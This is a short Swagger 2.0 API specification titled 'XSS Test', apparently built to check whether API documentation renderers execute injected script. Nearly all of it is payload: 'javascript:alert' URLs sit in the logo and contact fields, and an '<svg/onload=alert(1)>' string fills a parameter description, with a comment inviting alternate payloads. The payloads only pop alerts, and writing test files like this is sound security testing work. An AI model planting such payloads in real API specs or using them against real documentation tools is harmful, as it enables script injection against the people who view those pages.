swagger: "2.0"
info:
  title: "XSS Test"
  # Try these alternate payloads:
  x-logo:
    url: "javascript:alert(1)"
  contact:
    url: "javascript:alert(document.domain)"
paths:
  /test:
    get:
      summary: "Normal endpoint"
      parameters:
        - name: "exploit"
          in: query
          description: "<svg/onload=alert(1)>"
          type: string
